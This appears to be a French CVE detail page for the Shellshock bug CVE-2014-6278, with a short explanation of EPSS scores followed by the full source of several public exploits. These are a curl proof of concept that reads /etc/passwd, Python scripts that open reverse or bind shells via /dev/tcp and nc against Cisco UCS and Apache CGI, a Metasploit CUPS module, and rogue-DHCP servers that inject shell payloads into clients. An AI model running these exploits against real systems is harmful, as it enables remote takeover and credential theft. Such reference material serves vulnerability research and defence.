CVE-2014-6278 : Détail

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.

# Exploit Title: ShellShock On Sun Secure Global Desktop & Oracle Global desktop # Google Dork: intitle:Install the Sun Secure Global Desktop Native Client # Date: 6/4/2016 # Exploit Author: [email protected] # Vendor Homepage: http://www.sun.com/ & http://www.oracle.com/ # Software Link: http://www.oracle.com/technetwork/server-storage/securedesktop/downloads/index.html # Version: 4.61.915 # Tested on: Linux VULNERABLE FILE http://target.com//tarantella/cgi-bin/modules.cgi POC : localhost@~#curl -A "() { :; }; echo; /bin/cat /etc/passwd" http://target.com/tarantella/cgi-bin/modules.cgi > xixixi.txt localhost@~#cat xixixi.txt which will print out the content of /etc/passwd file.

#!/usr/bin/python ############################################### # Cisco UCS Manager 2.1(1b) Shellshock Exploit # # CVE-2014-6278 # Confirmed on version 2.1(1b), but more are likely vulnerable. # Cisco's advisory: # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash # Exploit generates a reverse shell to a nc listener. # Exploit Author: @thatchriseckert ############################################### import sys import requests import time if len(sys.argv) < 4: print "\n[*] Cisco UCS Manager 2.1(1b) Shellshock Exploit" print "[*] Usage: <Victim IP> <Attacking Host> <Reverse Shell Port>" print "[*]" print "[*] Example: shellshock.py 127.0.0.1 127.0.0.1 4444" print "[*] Listener: nc -lvp <port>" print "\n" sys.exit() #Disables request warning for cert validation ignore. requests.packages.urllib3.disable_warnings() ucs = sys.argv[1] url = "https://" + ucs + "/ucsm/isSamInstalled.cgi" attackhost = sys.argv[2] revshellport = sys.argv[3] headers1 = { 'User-Agent': '() { ignored;};/bin/bash -i >& /dev/tcp/' + attackhost + '/' + revshellport + ' 0>&1' } headers2 = { "User-Agent": '() { test;};echo \"Content-type: text/plain\"; echo; echo; echo $(</etc/passwd)' } def exploit(): try: r = requests.get(url, headers=headers1, verify=False, timeout=5) except Exception, e: if 'timeout' in str(e): print "[+] Success. Enjoy your shell..." else: print "[-] Something is wrong..." print "[-] Error: " + str(e) def main(): try: r = requests.get(url, headers=headers2, verify=False, timeout=3) if r.content.startswith('\nroot:'): print "[+] Host is vulnerable, spawning shell..." time.sleep(3) exploit() else: print "[-] Host is not vulnerable, quitting..." sys.exit() except Exception, e: print "[-] Something is wrong..." print "[-] Error: " + str(e) if __name__ == "__main__": main()

#!/usr/bin/env python from socket import * from threading import Thread import thread, time, httplib, urllib, sys stop = False proxyhost = "" proxyport = 0 def usage(): print """ Shellshock apache mod_cgi remote exploit Usage: ./exploit.py var=<value> Vars: rhost: victim host rport: victim port for TCP shell binding lhost: attacker host for TCP shell reversing lport: attacker port for TCP shell reversing pages: specific cgi vulnerable pages (separated by comma) proxy: host:port proxy Payloads: "reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport) "bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport) Example: ./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234 ./exploit.py payload=bind rhost=1.2.3.4 rport=1234 Credits: Federico Galatolo 2014 """ sys.exit(0) def exploit(lhost,lport,rhost,rport,payload,pages): headers = {"Cookie": payload, "Referer": payload} for page in pages: if stop: return print "[-] Trying exploit on : "+page if proxyhost != "": c = httplib.HTTPConnection(proxyhost,proxyport) c.request("GET","http://"+rhost+page,headers=headers) res = c.getresponse() else: c = httplib.HTTPConnection(rhost) c.request("GET",page,headers=headers) res = c.getresponse() if res.status == 404: print "[*] 404 on : "+page time.sleep(1) args = {} for arg in sys.argv[1:]: ar = arg.split("=") args[ar[0]] = ar[1] try: args['payload'] except: usage() if args['payload'] == 'reverse': try: lhost = args['lhost'] lport = int(args['lport']) rhost = args['rhost'] payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &" except: usage() elif args['payload'] == 'bind': try: rhost = args['rhost'] rport = args['rport'] payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'" except: usage() else: print "[*] Unsupported payload" usage() try: pages = args['pages'].split(",") except: pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"] try: proxyhost,proxyport = args['proxy'].split(":") except: pass if args['payload'] == 'reverse': serversocket = socket(AF_INET, SOCK_STREAM) buff = 1024 addr = (lhost, lport) serversocket.bind(addr) serversocket.listen(10) print "[!] Started reverse shell handler" thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,)) if args['payload'] == 'bind': serversocket = socket(AF_INET, SOCK_STREAM) addr = (rhost,int(rport)) thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,)) buff = 1024 while True: if args['payload'] == 'reverse': clientsocket, clientaddr = serversocket.accept() print "[!] Successfully exploited" print "[!] Incoming connection from "+clientaddr[0] stop = True clientsocket.settimeout(3) while True: reply = raw_input(clientaddr[0]+"> ") clientsocket.sendall(reply+"\n") try: data = clientsocket.recv(buff) print data except: pass if args['payload'] == 'bind': try: serversocket = socket(AF_INET, SOCK_STREAM) time.sleep(1) serversocket.connect(addr) print "[!] Successfully exploited" print "[!] Connected to "+rhost stop = True serversocket.settimeout(3) while True: reply = raw_input(rhost+"> ") serversocket.sendall(reply+"\n") data = serversocket.recv(buff) print data except: pass

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 < Msf::Exploit::Remote Rank = GoodRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'CUPS Filter Bash Environment Variable Code Injection', 'Description' => %q{ This module exploits a post-auth code injection in specially crafted environment variables in Bash, specifically targeting CUPS filters through the PRINTER_INFO and PRINTER_LOCATION variables by default. }, 'Author' => [ 'Stephane Chazelas', # Vulnerability discovery 'lcamtuf', # CVE-2014-6278 'Brendan Coles <bcoles[at]gmail.com>' # msf ], 'References' => [ ['CVE', '2014-6271'], ['CVE', '2014-6278'], ['EDB', '34765'], ['URL', 'https://access.redhat.com/articles/1200223'], ['URL', 'http://seclists.org/oss-sec/2014/q3/649'] ], 'Privileged' => false, 'Arch' => ARCH_CMD, 'Platform' => 'unix', 'Payload' => { 'Space' => 1024, 'BadChars' => "\x00\x0A\x0D", 'DisableNops' => true }, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic bash awk ruby' }, # Tested: # - CUPS version 1.4.3 on Ubuntu 10.04 (x86) # - CUPS version 1.5.3 on Debian 7 (x64) # - CUPS version 1.6.2 on Fedora 19 (x64) # - CUPS version 1.7.2 on Ubuntu 14.04 (x64) 'Targets' => [[ 'Automatic Targeting', { 'auto' => true } ]], 'DefaultTarget' => 0, 'DisclosureDate' => 'Sep 24 2014', 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(631), OptBool.new('SSL', [ true, 'Use SSL', true ]), OptString.new('USERNAME', [ true, 'CUPS username', 'root']), OptString.new('PASSWORD', [ true, 'CUPS user password', '']), OptEnum.new('CVE', [ true, 'CVE to exploit', 'CVE-2014-6271', ['CVE-2014-6271', 'CVE-2014-6278'] ]), OptString.new('RPATH', [ true, 'Target PATH for binaries', '/bin' ]) ], self.class) end # # CVE-2014-6271 # def cve_2014_6271(cmd) %{() { :;}; $(#{cmd}) & } end # # CVE-2014-6278 # def cve_2014_6278(cmd) %{() { _; } >_[$($())] { echo -e "\r\n$(#{cmd})\r\n" ; }} end # # Check credentials # def check @cookie = rand_text_alphanumeric(16) printer_name = rand_text_alphanumeric(10 + rand(5)) res = add_printer(printer_name, '') if !res vprint_error("#{peer} - No response from host") return Exploit::CheckCode::Unknown elsif res.headers['Server'] =~ /CUPS\/([\d\.]+)/ vprint_status("#{peer} - Found CUPS version #{$1}") else print_status("#{peer} - Target is not a CUPS web server") return Exploit::CheckCode::Safe end if res.body =~ /Set Default Options for #{printer_name}/ vprint_good("#{peer} - Added printer successfully") delete_printer(printer_name) elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) vprint_error("#{peer} - Authentication failed") elsif res.code == 426 vprint_error("#{peer} - SSL required - set SSL true") end Exploit::CheckCode::Detected end # # Exploit # def exploit @cookie = rand_text_alphanumeric(16) printer_name = rand_text_alphanumeric(10 + rand(5)) # Select target CVE case datastore['CVE'] when 'CVE-2014-6278' cmd = cve_2014_6278(payload.raw) else cmd = cve_2014_6271(payload.raw) end # Add a printer containing the payload # with a CUPS filter pointing to /bin/bash res = add_printer(printer_name, cmd) if !res fail_with(Failure::Unreachable, "#{peer} - Could not add printer - Connection failed.") elsif res.body =~ /Set Default Options for #{printer_name}/ print_good("#{peer} - Added printer successfully") elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) fail_with(Failure::NoAccess, "#{peer} - Could not add printer - Authentication failed.") elsif res.code == 426 fail_with(Failure::BadConfig, "#{peer} - Could not add printer - SSL required - set SSL true.") else fail_with(Failure::Unknown, "#{peer} - Could not add printer.") end # Add a test page to the print queue. # The print job triggers execution of the bash filter # which executes the payload in the environment variables. res = print_test_page(printer_name) if !res fail_with(Failure::Unreachable, "#{peer} - Could not add test page to print queue - Connection failed.") elsif res.body =~ /Test page sent; job ID is/ vprint_good("#{peer} - Added test page to printer queue") elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) fail_with(Failure::NoAccess, "#{peer} - Could not add test page to print queue - Authentication failed.") elsif res.code == 426 fail_with(Failure::BadConfig, "#{peer} - Could not add test page to print queue - SSL required - set SSL true.") else fail_with(Failure::Unknown, "#{peer} - Could not add test page to print queue.") end # Delete the printer res = delete_printer(printer_name) if !res fail_with(Failure::Unreachable, "#{peer} - Could not delete printer - Connection failed.") elsif res.body =~ /has been deleted successfully/ print_status("#{peer} - Deleted printer '#{printer_name}' successfully") elsif res.code == 401 || (res.code == 426 && datastore['SSL'] == true) vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - Authentication failed.") elsif res.code == 426 vprint_warning("#{peer} - Could not delete printer '#{printer_name}' - SSL required - set SSL true.") else vprint_warning("#{peer} - Could not delete printer '#{printer_name}'") end end # # Add a printer to CUPS # def add_printer(printer_name, cmd) vprint_status("#{peer} - Adding new printer '#{printer_name}'") ppd_name = "#{rand_text_alphanumeric(10 + rand(5))}.ppd" ppd_file = <<-EOF *PPD-Adobe: "4.3" *%==== General Information Keywords ======================== *FormatVersion: "4.3" *FileVersion: "1.00" *LanguageVersion: English *LanguageEncoding: ISOLatin1 *PCFileName: "#{ppd_name}" *Manufacturer: "Brother" *Product: "(Brother MFC-3820CN)" *1284DeviceID: "MFG:Brother;MDL:MFC-3820CN" *cupsVersion: 1.1 *cupsManualCopies: False *cupsFilter: "application/vnd.cups-postscript 0 #{datastore['RPATH']}/bash" *cupsModelNumber: #{rand(10) + 1} *ModelName: "Brother MFC-3820CN" *ShortNickName: "Brother MFC-3820CN" *NickName: "Brother MFC-3820CN CUPS v1.1" *% *%==== Basic Device Capabilities ============= *LanguageLevel: "3" *ColorDevice: True *DefaultColorSpace: RGB *FileSystem: False *Throughput: "12" *LandscapeOrientation: Plus90 *VariablePaperSize: False *TTRasterizer: Type42 *FreeVM: "1700000" *DefaultOutputOrder: Reverse *%==== Media Selection ====================== *OpenUI *PageSize/Media Size: PickOne *OrderDependency: 18 AnySetup *PageSize *DefaultPageSize: BrLetter *PageSize BrA4/A4: "<</PageSize[595 842]/ImagingBBox null>>setpagedevice" *PageSize BrLetter/Letter: "<</PageSize[612 792]/ImagingBBox null>>setpagedevice" EOF pd = Rex::MIME::Message.new pd.add_part(ppd_file, 'application/octet-stream', nil, %(form-data; name="PPD_FILE"; filename="#{ppd_name}")) pd.add_part("#{@cookie}", nil, nil, %(form-data; name="org.cups.sid")) pd.add_part("add-printer", nil, nil, %(form-data; name="OP")) pd.add_part("#{printer_name}", nil, nil, %(form-data; name="PRINTER_NAME")) pd.add_part("", nil, nil, %(form-data; name="PRINTER_INFO")) # injectable pd.add_part("#{cmd}", nil, nil, %(form-data; name="PRINTER_LOCATION")) # injectable pd.add_part("file:///dev/null", nil, nil, %(form-data; name="DEVICE_URI")) data = pd.to_s data.strip! send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin'), 'ctype' => "multipart/form-data; boundary=#{pd.bound}", 'data' => data, 'cookie' => "org.cups.sid=#{@cookie};", 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) ) end # # Queue a printer test page # def print_test_page(printer_name) vprint_status("#{peer} - Adding test page to printer queue") send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'printers', printer_name), 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'cookie' => "org.cups.sid=#{@cookie}", 'vars_post' => { 'org.cups.sid' => @cookie, 'OP' => 'print-test-page' } ) end # # Delete a printer # def delete_printer(printer_name) vprint_status("#{peer} - Deleting printer '#{printer_name}'") send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri(target_uri.path, 'admin'), 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), 'cookie' => "org.cups.sid=#{@cookie}", 'vars_post' => { 'org.cups.sid' => @cookie, 'OP' => 'delete-printer', 'printer_name' => printer_name, 'confirm' => 'Delete Printer' } ) end end

#!/usr/bin/python # Exploit Title: ShellShock dhclient Bash Environment Variable Command Injection PoC # Date: 2014-09-29 # Author: @fdiskyou # e-mail: rui at deniable.org # Version: 4.1 # Tested on: Debian, Ubuntu, Kali # CVE: CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187 from scapy.all import * conf.checkIPaddr = False fam,hw = get_if_raw_hwaddr(conf.iface) victim_assign_ip = "10.0.1.100" server_ip = "10.0.1.2" gateway_ip = "10.0.1.2" subnet_mask = "255.255.255.0" dns_ip = "8.8.8.8" spoofed_mac = "00:50:56:c0:00:01" payload = "() { ignored;}; echo 'moo'" payload_2 = "() { ignored;}; /bin/nc -e /bin/bash localhost 7777" payload_3 = "() { ignored;}; /bin/bash -i >& /dev/tcp/10.0.1.1/4444 0>&1 &" payload_4 = "() { ignored;}; /bin/cat /etc/passwd" payload_5 = "() { ignored;}; /usr/bin/wget http://google.com" rce = payload_5 def toMAC(strMac): cmList = strMac.split(":") hCMList = [] for iter1 in cmList: hCMList.append(int(iter1, 16)) hMAC = struct.pack('!B', hCMList[0]) + struct.pack('!B', hCMList[1]) + struct.pack('!B', hCMList[2]) + struct.pack('!B', hCMList[3]) + struct.pack('!B', hCMList[4]) + struct.pack('!B', hCMList[5]) return hMAC def detect_dhcp(pkt): # print 'Process ', ls(pkt) if DHCP in pkt: # if DHCP Discover then DHCP Offer if pkt[DHCP].options[0][1]==1: clientMAC = pkt[Ether].src print "DHCP Discover packet detected from " + clientMAC sendp( Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/ IP(src=server_ip,dst="255.255.255.255")/ UDP(sport=67,dport=68)/ BOOTP( op=2, yiaddr=victim_assign_ip, siaddr=server_ip, giaddr=gateway_ip, chaddr=toMAC(clientMAC), xid=pkt[BOOTP].xid, sname=server_ip )/ DHCP(options=[('message-type','offer')])/ DHCP(options=[('subnet_mask',subnet_mask)])/ DHCP(options=[('name_server',dns_ip)])/ DHCP(options=[('lease_time',43200)])/ DHCP(options=[('router',gateway_ip)])/ DHCP(options=[('dump_path',rce)])/ DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1" ) print "DHCP Offer packet sent" # if DHCP Request than DHCP ACK if pkt[DHCP] and pkt[DHCP].options[0][1] == 3: clientMAC = pkt[Ether].src print "DHCP Request packet detected from " + clientMAC sendp( Ether(src=spoofed_mac,dst="ff:ff:ff:ff:ff:ff")/ IP(src=server_ip,dst="255.255.255.255")/ UDP(sport=67,dport=68)/ BOOTP( op=2, yiaddr=victim_assign_ip, siaddr=server_ip, giaddr=gateway_ip, chaddr=toMAC(clientMAC), xid=pkt[BOOTP].xid )/ DHCP(options=[('message-type','ack')])/ DHCP(options=[('subnet_mask',subnet_mask)])/ DHCP(options=[('lease_time',43200)])/ DHCP(options=[('router',gateway_ip)])/ DHCP(options=[('name_server',dns_ip)])/ DHCP(options=[('dump_path',rce)])/ DHCP(options=[('server_id',server_ip),('end')]), iface="vmnet1" ) print "DHCP Ack packet sent" def main(): #sniff DHCP requests sniff(filter="udp and (port 67 or 68)", prn=detect_dhcp, iface="vmnet1") if __name__ == '__main__': sys.exit(main())

#!/usr/bin/python # Exploit Title: dhclient shellshocker # Google Dork: n/a # Date: 10/1/14 # Exploit Author: @0x00string # Vendor Homepage: gnu.org # Software Link: http://ftp.gnu.org/gnu/bash/bash-4.3.tar.gz # Version: 4.3.11 # Tested on: Ubuntu 14.04.1 # CVE : CVE-2014-6277,CVE-2014-6278,CVE-2014-7169,CVE-2014-7186,CVE-2014-7187 # ______ ______ ______ _ # / __ | / __ |/ __ | _ (_) #| | //| |_ _| | //| | | //| | ___| |_ ____ _ ____ ____ ___ #| |// | ( \ / ) |// | | |// | |/___) _) / ___) | _ \ / _ |/___) #| /__| |) X (| /__| | /__| |___ | |__| | | | | | ( ( | |___ | # \_____/(_/ \_)\_____/ \_____/(___/ \___)_| |_|_| |_|\_|| (___/ # (_____| # _ _ _ _ # | | | | (_) _ # _ | | | _ ____| |_ ____ ____ | |_ # / || | || \ / ___) | |/ _ ) _ \| _) #( (_| | | | ( (___| | ( (/ /| | | | |__ # \____|_| |_|\____)_|_|\____)_| |_|\___) # # _ _ _ _ _ # | | | | | | | | | # ___| | _ ____| | | ___| | _ ___ ____| | _ ____ ____ # /___) || \ / _ ) | |/___) || \ / _ \ / ___) | / ) _ )/ ___) #|___ | | | ( (/ /| | |___ | | | | |_| ( (___| |< ( (/ /| | #(___/|_| |_|\____)_|_(___/|_| |_|\___/ \____)_| \_)____)_| # this buddy listens for clients performing a DISCOVER, a later version will exploit periodic REQUESTs, which can sometimes be prompted by causing IP conflicts # once a broadcast DISCOVER packet has been detected, the XID, MAC and requested IP are pulled from the pack and a corresponding OFFER and ACK are generated and pushed out # The client is expected to reject the offer in preference of their known DHCP server, but will still process the packet, triggering the vulnerability. # can use option 114, 56 or 61, though is hardcoded to use 114 as this is merely a quick and dirty example. import socket, struct def HexToByte( hexStr ): b = [] h = ''.join( h.split(" ") ) for i in range(0, len(h), 2): b.append( chr( int (h[i:i+2], 16 ) ) ) return ''.join( b ) rport = 68 lport = 67 bsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) bsock.bind(("<broadcast>", lport)) while True: OP = "72" # 56, Message - RFC 1533,2132. 61, Client-identifier - RFC 1533,2132,4361 or 114, URL - RFC 3679 are currently known to work, here we use 114 URL = "() { :;}; bash -i >& /dev/tcp/10.0.0.1/1337 0>&1".encode("hex") URLLEN = chr(len(URL) / 2).encode("hex") END = "03040a000001ff" broadcast_get, (bcrhost, rport) = bsock.recvfrom(2048) hexip = broadcast_get[245:249] rhost = str(ord(hexip[0])) + "." + str(ord(hexip[1])) + "." + str(ord(hexip[2])) + "." + str(ord(hexip[3])) XID = broadcast_get[4:8].encode("hex") chaddr = broadcast_get[29:34].encode("hex") print "[+]\tgot broadcast with XID " + XID + " requesting IP " + rhost + "\n" OFFER = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010236040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END OFFER_BYTES = HexToByte(OFFER) ACK = "02010600" + XID + "00000000000000000a0000430a0000010000000000" + chaddr + "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006382536335010536040a000001330400000e103a04000007083b0400000c4e0104ffffff001c040a0000ff06040a0000010f034c4f4c0c076578616d706c65" + OP + URLLEN + URL + END ACK_BYTES = HexToByte(ACK) print "[+]\tsending evil offer\n" sock.sendto(OFFER_BYTES, (rhost, rport)) broadcast_get2 = bsock.recvfrom(2048) print "[+]\tassuming request was received, sending ACK\n" sock.sendto(ACK_BYTES, (rhost, rport))